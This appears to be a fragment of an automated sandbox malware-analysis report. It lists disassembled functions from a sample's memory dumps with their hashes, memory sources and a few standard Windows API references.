API ID: Time$FileSystemUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 1518329722-0
Opcode ID: e180163b605ce24ec50b538605d54e7015c692564284d471828b5f4d87c2059b
Instruction ID: 1c50189d93918816d196ec70bd43d3640a511bc00310eef3747ee1678f9f3f9c
Opcode Fuzzy Hash: e180163b605ce24ec50b538605d54e7015c692564284d471828b5f4d87c2059b
Instruction Fuzzy Hash: 09F0F9B1E002147B8724AF6EC8049DFBEE9EEC5770725465AE809D3340D5B4CD8182D4

Function 005E2D44 Relevance: 2.9, Strings: 1, Instructions: 1626COMMON

Download Yara Rule

Strings

avqr, xrefs: 005E34C1

Memory Dump Source

Source File: 00000000.00000002.1946801836.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Similarity

API ID:
String ID: avqr
API String ID: 0-2056061759
Opcode ID: 565e541af30e19230bfed240ab449f4cc8cecbb24506589418f2adaf6b8b58d8
Instruction ID: 6c2a626d4adf93af0e5aad3c42c63821c026ebe14d2658308b943ab674a21776
Opcode Fuzzy Hash: 565e541af30e19230bfed240ab449f4cc8cecbb24506589418f2adaf6b8b58d8
Instruction Fuzzy Hash: D9B24BF350C2049FE3046E2DEC9567ABBE9EF94320F1A463DEAC5C7744EA3558048697

Function 00544756 Relevance: 2.7, Strings: 2, Instructions: 195COMMON

Download Yara Rule

Strings

hC9G, xrefs: 0054480E
hC0K, xrefs: 005447F6

Memory Dump Source

Source File: 00000000.00000002.1946801836.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Similarity

API ID:
String ID: hC0K$hC9G
API String ID: 0-896504281
Opcode ID: cb74b2f4ae3dd481fbe7599f3c727f8e0e497d06a21620baa448c13cd8640542
Instruction ID: e252a64c9ebcba7a3876dac5356c8627fcd3d23b39e9657669b0266f8c258be5
Opcode Fuzzy Hash: cb74b2f4ae3dd481fbe7599f3c727f8e0e497d06a21620baa448c13cd8640542
Instruction Fuzzy Hash: BB5136F390C6045BE3087E2DEC8577BBBE9EB90320F1A463DDAC497784E93598158287

Function 1000E184 Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,1000E17F,?,?,00000008,?,?,1000DE14,00000000), ref: 1000E3B1

Memory Dump Source

Source File: 00000000.00000002.1950094801.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1950073268.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1950119045.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1950143184.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_file.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: d9cad4c0d431712b17d678ca3744fd01f07566361e254315dc393335121516ed
Instruction ID: 1a3fbdf84673f95942c1f426381f735e0c8de5aa42652e790f36daf84cbc2009
Opcode Fuzzy Hash: d9cad4c0d431712b17d678ca3744fd01f07566361e254315dc393335121516ed
Instruction Fuzzy Hash: 9CB14A31610649CFE715CF28C486B997BE0FF453A4F258658E89ADF2A5C335EE82CB40

Function 0041572E Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00415729,?,?,00000008,?,?,0041C68A,00000000), ref: 0041595B

Memory Dump Source

Source File: 00000000.00000002.1946726542.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: e03884c1b799fb46ae45e907d4085e80ad0ec7257463db2e47aeebe4ac254d4e
Instruction ID: 6715a78ad53a010e1f654acf6738d2326510568a7b3af97ced4f43bd22a978ec
Opcode Fuzzy Hash: e03884c1b799fb46ae45e907d4085e80ad0ec7257463db2e47aeebe4ac254d4e
Instruction Fuzzy Hash: 02B17E71520A08DFD714CF28C486BE57BE0FF85364F298659E899CF2A1C339D992CB45

Function 04A35995 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,04A35990,?,?,00000008,?,?,04A3C8F1,00000000), ref: 04A35BC2

Memory Dump Source

Source File: 00000000.00000002.1949513985.0000000004A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a20000_file.jbxd

Yara matches

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: e03884c1b799fb46ae45e907d4085e80ad0ec7257463db2e47aeebe4ac254d4e
Instruction ID: 705311cd642ff3ee63db008c190b2e64a189b20e9e15a7bf1a6e5239ef6ecb4a
Opcode Fuzzy Hash: e03884c1b799fb46ae45e907d4085e80ad0ec7257463db2e47aeebe4ac254d4e
Instruction Fuzzy Hash: 80B1FC31A10608AFD715CF2CC48AB557BE0FF45366F698698F899CF2A1E335E991CB40

Function 0040A2EC Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0040A302

Memory Dump Source

Source File: 00000000.00000002.1946726542.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 0087427e5fec96f3a69268fd39bcd2ddcdf30d7205d75486cccbac6015e6632e
Instruction ID: 655f466d2002f1984def2d585099db1cc9528c498776e59a8b59a497753dfce5
Opcode Fuzzy Hash: 0087427e5fec96f3a69268fd39bcd2ddcdf30d7205d75486cccbac6015e6632e
Instruction Fuzzy Hash: 4C5136B1E10315CFDB24CF95D8857AABBF0FB48314F24803AD905EB3A1D37899568B99

Function 00417727 Relevance: 1.6, APIs: 1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1946726542.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f1184e7a09d65eff5b8ffcd4e3bf1005a55978abbf3cbcf98c0185f47ed9858
Instruction ID: 0da0f6d43ac66bea4d05f4cd5f3fcaee254ac53de518b98f89be5a9909b1102a
Opcode Fuzzy Hash: 1f1184e7a09d65eff5b8ffcd4e3bf1005a55978abbf3cbcf98c0185f47ed9858
Instruction Fuzzy Hash: 7B41B4B5C0421CAEDF20DF69CC89AEABBB8AF44304F1442DEE419D3241DA389E85CF54

Function 10007EA9 Relevance: 1.6, APIs: 1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1950094801.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1950073268.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1950119045.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1950143184.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30f242089dd6e22cc4e11ed5014ed8825358ef4a723b8267613fb38b8f4a68e2
Instruction ID: 335cc09878d9dc9b483997cee4c12024a5fb43c2c5be13206e8e105b8fe94413
Opcode Fuzzy Hash: 30f242089dd6e22cc4e11ed5014ed8825358ef4a723b8267613fb38b8f4a68e2
Instruction Fuzzy Hash: 1B41B475C0425DAFEB10DF69CC89AEABBB9FF45240F1442D9E44DD3205DA359E848F10

Function 04A3798E Relevance: 1.6, APIs: 1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1949513985.0000000004A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a20000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f1184e7a09d65eff5b8ffcd4e3bf1005a55978abbf3cbcf98c0185f47ed9858
Instruction ID: 7f7b74945995d192122476c3b5f7820f72faea9da0ece40d9bb4ce09edd6b70e
Opcode Fuzzy Hash: 1f1184e7a09d65eff5b8ffcd4e3bf1005a55978abbf3cbcf98c0185f47ed9858
Instruction Fuzzy Hash: 834188B9C04119AFDF20DF69CD88AEABBB8EF45305F5442D9F459D3200EA346E458F50

Function 0040EF09 Relevance: 1.6, Strings: 1, Instructions: 333COMMON

Download Yara Rule

Strings

0, xrefs: 0040F079

Memory Dump Source

Source File: 00000000.00000002.1946726542.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 8470d482166b29df0f0bdf2b707670bb0d2149d7074c5d4c6b8b9bc3646ec2c9
Instruction ID: a862614980e7782cfb360a41e62bb903fc37a91afa162c473b4857922a947482
Opcode Fuzzy Hash: 8470d482166b29df0f0bdf2b707670bb0d2149d7074c5d4c6b8b9bc3646ec2c9
Instruction Fuzzy Hash: DDC1EE309006079ECB34CE69C584A7BBBB1AB45304F144A7FD856B7BD2C339AD0ACB59

Function 04A2F170 Relevance: 1.6, Strings: 1, Instructions: 333COMMON

Download Yara Rule

Strings

0, xrefs: 04A2F2E0

Memory Dump Source

Source File: 00000000.00000002.1949513985.0000000004A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a20000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 8eb8cff735118d4cdf18e48b5e4fd70e4005089286b1f543a5e77019ad8e0901
Instruction ID: 60c4c2b80f66f2c07aa1e023bfe408f87f0c578ac0e9e9aafc1548cf4f49aff5
Opcode Fuzzy Hash: 8eb8cff735118d4cdf18e48b5e4fd70e4005089286b1f543a5e77019ad8e0901
Instruction Fuzzy Hash: CDC1E134A006268FDB28CF6CC7846BABBB1BF46304F144619F9629B691D370F945FB51

Function 0040EBC7 Relevance: 1.6, Strings: 1, Instructions: 318COMMON

Download Yara Rule

Strings

0, xrefs: 0040ED4B

Memory Dump Source

Source File: 00000000.00000002.1946726542.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 0c5b649a34a28a7901ced7402a87d0ab1891e4bc7ca1eda254f1c36e1c86cddc
Instruction ID: c83ad001e3c04e1f23fe5313526111bf351830610e2bf169758c16327f184a9c
Opcode Fuzzy Hash: 0c5b649a34a28a7901ced7402a87d0ab1891e4bc7ca1eda254f1c36e1c86cddc
Instruction Fuzzy Hash: 3EB1E47090460B8BDB248E6AC555ABFB7A1AF41304F140E3FD452B77C1C73EAD268B89

Function 04A2EE2E Relevance: 1.6, Strings: 1, Instructions: 318COMMON

Download Yara Rule

Strings

0, xrefs: 04A2EFB2

Memory Dump Source

Source File: 00000000.00000002.1949513985.0000000004A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a20000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 879cce724f58335765498cd27df84c01b4e50fca817c5947501d6afb968e75ec
Instruction ID: 2fe08b022c3a9a4f29d66db7b99a1f715ff0db4e0f2384aa2396f93c1ce30cd2
Opcode Fuzzy Hash: 879cce724f58335765498cd27df84c01b4e50fca817c5947501d6afb968e75ec
Instruction Fuzzy Hash: 23B1AD70A0462A9FDB288F6CCB54ABFBBB1FF04304F14061DE552A7690D731BA81BB51

Function 0066B4C9 Relevance: 1.5, Strings: 1, Instructions: 269COMMON

Download Yara Rule

Strings

CiO[, xrefs: 0066B540

Memory Dump Source

Source File: 00000000.00000002.1946801836.00000000005FB000.00000040.00000001.01000000.00000003.sdmp, Offset: 005FB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5fb000_file.jbxd

Similarity

API ID:
String ID: CiO[
API String ID: 0-1689977814
Opcode ID: ee6d93e46dcd7fbd2cd7278fbea2c312a97e26201de16680d7bddbe795ba3066
Instruction ID: 32b84d6320a43637aa19bff2d1fc79bd70ab466c52c3838ff8f9647845e4fedf
Opcode Fuzzy Hash: ee6d93e46dcd7fbd2cd7278fbea2c312a97e26201de16680d7bddbe795ba3066
Instruction Fuzzy Hash: C791E0B280C314EFD3046F29D8052BAFBE9EF44760F26492EEAC5C3240E77559819B87

Function 0040A720 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0000A72C,0040A0A4), ref: 0040A725

Memory Dump Source

Source File: 00000000.00000002.1946726542.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: f7f15cac9e9bf66a9e2158eab73941a450ed06a429c5457dfeeb9365a06e4f3f
Instruction ID: 2e9130e8fabf2091f020550841097bdee3684dee1eb7d8ffdadd4873c3d8fa43
Opcode Fuzzy Hash: f7f15cac9e9bf66a9e2158eab73941a450ed06a429c5457dfeeb9365a06e4f3f
Instruction Fuzzy Hash:

Function 04A2A987 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(0040A72C,04A2A30B), ref: 04A2A98C

Memory Dump Source

Source File: 00000000.00000002.1949513985.0000000004A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a20000_file.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: f7f15cac9e9bf66a9e2158eab73941a450ed06a429c5457dfeeb9365a06e4f3f
Instruction ID: 2e9130e8fabf2091f020550841097bdee3684dee1eb7d8ffdadd4873c3d8fa43
Opcode Fuzzy Hash: f7f15cac9e9bf66a9e2158eab73941a450ed06a429c5457dfeeb9365a06e4f3f
Instruction Fuzzy Hash:

Function 0067A866 Relevance: 1.3, Strings: 1, Instructions: 80COMMON

Download Yara Rule

Strings

f_>m, xrefs: 0067A876

Memory Dump Source

Source File: 00000000.00000002.1946801836.00000000005FB000.00000040.00000001.01000000.00000003.sdmp, Offset: 005FB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5fb000_file.jbxd

Similarity

API ID:
String ID: f_>m
API String ID: 0-707729622
Opcode ID: 0bc0079d094b847a86a30da46787d1835b6672ec6dd4ce395127261b4dba9e06
Instruction ID: 60ccc38d875f5ac0c8c77ffc0449ed4b7c188277eb6f4369d9267a9efacd350c
Opcode Fuzzy Hash: 0bc0079d094b847a86a30da46787d1835b6672ec6dd4ce395127261b4dba9e06
Instruction Fuzzy Hash: 05218EB650C208EFE311BE29DC45B6EBBE5EF98321F16092DD7D483610EA31A514CA97

Function 00415E59 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1946726542.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bed945026c03525ca9e6f99888b728c839f34034abb34f6e91111b4f97e8ed69
Instruction ID: 2119cb9e33fec53289003fbb8559c0bd9e138a5c3f232e450aa7d4159409e329
Opcode Fuzzy Hash: bed945026c03525ca9e6f99888b728c839f34034abb34f6e91111b4f97e8ed69
Instruction Fuzzy Hash: 91320331E29F014DD7239A34D922336A649AFB73D4F56D737E819B5AA9EF28C4C34108

Function 004CAA2A Relevance: .3, Instructions: 282COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1946801836.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb138c3789b91073c860b9a9b7b99575fe86652b332e168c473902eb172064b5
Instruction ID: f9325dab247072d5f416875718a3da357a90e8cb399449258cfae49149266bc9
Opcode Fuzzy Hash: bb138c3789b91073c860b9a9b7b99575fe86652b332e168c473902eb172064b5
Instruction Fuzzy Hash: 11A1E1B3A082109FE304AF29DC5532ABBE5EF90710F1B893DDAC997384DA395845C787

Function 004A31D9 Relevance: .2, Instructions: 214COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1946801836.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18c74c8c0427273e5882bb3b3a89cf21ab46927486ddf79bdf4a31b9ed95ab79
Instruction ID: 4327c27a0a7b4c308f2650edcfcac01dac3b9db4ff4896d0ddbb452e3f68908f
Opcode Fuzzy Hash: 18c74c8c0427273e5882bb3b3a89cf21ab46927486ddf79bdf4a31b9ed95ab79
Instruction Fuzzy Hash: CB5176F3E182105BE354597CED847677ACADBD8320F2B863DEA88E7784D8398C0642D5

Function 004739CC Relevance: .2, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1946801836.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a813484076fda88f117ab105ac710c1a49cde2dd59f9c6e778c31d8ec8a3628a
Instruction ID: 4ba8d01dd3586a82868fa1b3a9c19355a7c196e2e07029858394f61d9e54201a
Opcode Fuzzy Hash: a813484076fda88f117ab105ac710c1a49cde2dd59f9c6e778c31d8ec8a3628a
Instruction Fuzzy Hash: 0F51F47350520E8FDB12CE25C5414EF37A1EF46332B34816BD845A3A02D7BA5E12AB9D

Function 00473F82 Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1946801836.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16bedf956fc0822d8c4795bf348597bdaac7a2f69802ee43b42da101d4273fb4
Instruction ID: 557e6d87ccc29a46229f8d08e2acd1bcbb0591ca579173f6d68f0e6e800a9cad
Opcode Fuzzy Hash: 16bedf956fc0822d8c4795bf348597bdaac7a2f69802ee43b42da101d4273fb4
Instruction Fuzzy Hash: 2851D0B3F5162547F35448B8CC983A666839BD5724F2F82788F6CAB7C6D8BE4C0942C4

Function 00503B78 Relevance: .2, Instructions: 177COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1946801836.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8092627bb82029be37a81be1e93b820b59d474479adeeac45f8f391e0e90a6dc
Instruction ID: 335e0ad944fe2531a606139520ecdc6c9d7b7c1897c2d62efb9155bed5125042
Opcode Fuzzy Hash: 8092627bb82029be37a81be1e93b820b59d474479adeeac45f8f391e0e90a6dc
Instruction Fuzzy Hash: 6B51F6F3A582145FF3105A2DEC44B6BB6DADBD4330F2A863EE684D7784E93D8C054296

Function 004BA9F0 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1946801836.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91fb37b0540f2884a3c6fc4837236b2e1a1d668f512f6980ef53ee381c111828
Instruction ID: 99fdb39b0facf28632d6a0340eca0c95dc7ae296a0ac1f1cd36049502564b993
Opcode Fuzzy Hash: 91fb37b0540f2884a3c6fc4837236b2e1a1d668f512f6980ef53ee381c111828
Instruction Fuzzy Hash: AE4156F7E181141BF348993ADD1A7777B8BDBD0220F2AC33DAA65C37C8E97594064192

Function 006FFCAE Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1946801836.00000000006FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 006FC000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fc000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48116410e182244d70c97bcb50c98f6053f974f6c8afc5f3b5d2700755c835cc
Instruction ID: 7a1f467b48170b2f940df9c85b3b3c0485482a7c6806d97725df5bd9baa1f78b
Opcode Fuzzy Hash: 48116410e182244d70c97bcb50c98f6053f974f6c8afc5f3b5d2700755c835cc
Instruction Fuzzy Hash: 2B418EB340C2149FE701BF58D8416BEF7E5EF99710F16482DEAD483610E63598548B97

Function 0040B6D0 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1946726542.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: ca795268159c21d128c013142cdfc2d9b79cbc1da2bbaf958516ecc3655a5718
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 39113DBB24014243D614873DD9F49B7A395EBC5320B2D437BD1416B7D4D33AE9459A8C

Function 100102A0 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1950094801.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1950073268.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1950119045.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1950143184.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 6858cf0c51ff5caabfc3a7f957f7e97cc4d55c404d013567cdc706fa4bfc5bf2
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 5111087774118243D681C56DC4F86ABA3DEFBC52A0729436AF0D28FA58D2F2DAC5A600

Function 04A2B937 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1949513985.0000000004A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a20000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: b076369f71df54cc81ec77b5a77de158c6c2699f39bd33b8a76a8c7e72040d2f
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: CC1104B72005B24796558F2ED7B42B6E795EFC6321B2C427AD0C18B75AD322F144F620

Function 04947D41 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1949284118.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4940000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: 47736ea044d0ca1cd383c8f3884ea05ffaa717700517a70fce43cbea3dac3c83
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: 331170723501049FD754DE95DC90FA673EAEBC9220B1981A6E904CB315E775E801C760

Function 04A20D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1949513985.0000000004A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a20000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: 0313d1a0eae5a042c7306fb1a154e3ea12e20153f93c19a9d124a3dfad796883
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: C801DB766056148FDF21CF28C944BAA33F6FB85315F4544B5E606D7241E774B941CB90

Function 10007A76 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1950094801.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1950073268.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1950119045.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1950143184.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 225e9490ce15994035050fff8e8d94bbe50aeb352c3921d505d22bbc77bda227
Instruction ID: 49573a245b17cd2143a7f0a663dc82b9d5ba07e6c12e429f55ccbb336c262c76
Opcode Fuzzy Hash: 225e9490ce15994035050fff8e8d94bbe50aeb352c3921d505d22bbc77bda227
Instruction Fuzzy Hash: CEE08C32E11228EBCB10CB88C940E8AB3ECFB86A80F114096B505E3101D274DF00C7C2

Function 00409BDD Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 51libraryloaderCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(0042D064,00000FA0,?,?,00409BBB), ref: 00409BE9
GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00409BBB), ref: 00409BF4
GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00409BBB), ref: 00409C05
GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00409C17
GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00409C25
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00409BBB), ref: 00409C48
DeleteCriticalSection.KERNEL32(0042D064,00000007,?,?,00409BBB), ref: 00409C64
CloseHandle.KERNEL32(00000000,?,?,00409BBB), ref: 00409C74

Strings

api-ms-win-core-synch-l1-2-0.dll, xrefs: 00409BEF
kernel32.dll, xrefs: 00409C00
SleepConditionVariableCS, xrefs: 00409C11
WakeAllConditionVariable, xrefs: 00409C1D

Memory Dump Source

Source File: 00000000.00000002.1946726542.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 2565136772-3242537097
Opcode ID: 4fb7e18995e5e2f02b724b68456555f771a33f70ab985dbad30083c91c8ea3bd
Instruction ID: 8f8b07cbf63392261d8dc325579aef03bb655b7cde116df0e27078c5153b7531
Opcode Fuzzy Hash: 4fb7e18995e5e2f02b724b68456555f771a33f70ab985dbad30083c91c8ea3bd
